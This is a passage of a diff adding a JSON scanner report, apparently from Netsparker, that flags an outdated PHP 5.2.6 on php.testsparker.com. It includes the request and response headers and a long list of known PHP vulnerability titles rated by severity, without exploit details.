    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "5.2.6" + }, + { + "Name": "Latest Version", + "Value": "8.0.7" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 06/18/2021 12:00:00 vulnerability database content." + }, + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "df809200-a510-4daf-8722-ad48024dd66f", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "KnownVulnerabilities": [ + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Link Resolution Before File Access ('Link Following') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Control of Generation of Code ('Code Injection') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP DEPRECATED: Code Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Data Processing Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Data Processing Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Data Processing Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Link Resolution Before File Access ('Link Following') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Control of Generation of Code ('Code Injection') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Access Control Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Missing Release of Resource after Effective Lifetime Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Uncontrolled Resource Consumption Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Link Resolution Before File Access ('Link Following') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Incorrect Conversion between Numeric Types Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Loop with Unreachable Exit Condition ('Infinite Loop') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Uncontrolled Resource Consumption Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Deserialization of Untrusted Data Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Check for Unusual or Exceptional Conditions Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Control of Generation of Code ('Code Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Deserialization of Untrusted Data Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Allocation of Resources Without Limits or Throttling Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Double Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Deserialization of Untrusted Data Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + 